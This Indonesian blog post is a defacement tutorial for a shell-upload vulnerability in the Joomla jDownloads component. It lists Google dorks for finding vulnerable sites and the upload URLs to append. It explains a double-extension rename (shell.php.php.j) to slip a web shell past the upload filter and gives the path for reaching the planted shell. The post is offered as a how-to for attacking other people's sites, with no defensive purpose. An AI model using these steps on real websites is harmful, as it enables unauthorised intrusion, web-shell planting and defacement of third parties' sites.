Support Idiot Attacker dengan klik subscribe di channel Disini, Banyak konten-konten Idiot attacker yg di upload disana.

Tutorial Deface dengan POC Jdownloads Shell Upload Vulnerability

Rio Setyawan 8:42 AM
Tutorial Deface dengan POC Jdownloads Shell Upload Vulnerability

Sebenarnya POC ini sudah lama,
Tapi aku bikin artikel lagi bagi yang belom tau, buat melengkapi postingan blog ini juga, siapa tau entar berguna.
Baca juga: Scanner JDownloads Vulnerability [ Perl ]

Skip.

Dork:
Powered by jDownloads
/index.php?option=com_jdownloads
inurl:/index.php?option=com_jdownloads intext:Powered by jDownloads

Kembangin lagi sendiri

Pastekan di google pencarian,
buka 1 per 1 tambahkan explot:
/index.php?option=com_jdownloads&Itemid=1&view=upload
atau
/index.php?option=com_jdownloads&Itemid=1&task=upload
Contoh:
http://www.target.com/index.php?option=com_jdownloads&Itemid=1&view=upload

Lalu isi data-data yang perlu, yang ada tanda merah di depan kotak isian,
Rename dulu shell mu sebelum di upload jadi shell.php.php.j
Lalu upload di bagian screenshort, Nanti shell otomatis berubah jadi shell.php.j

Acces shell kalian di:
http://www.target.com/images/jdownloads/screenshots/shell.php.j

Sekian :p
Previous
Next Post »
0 Komentar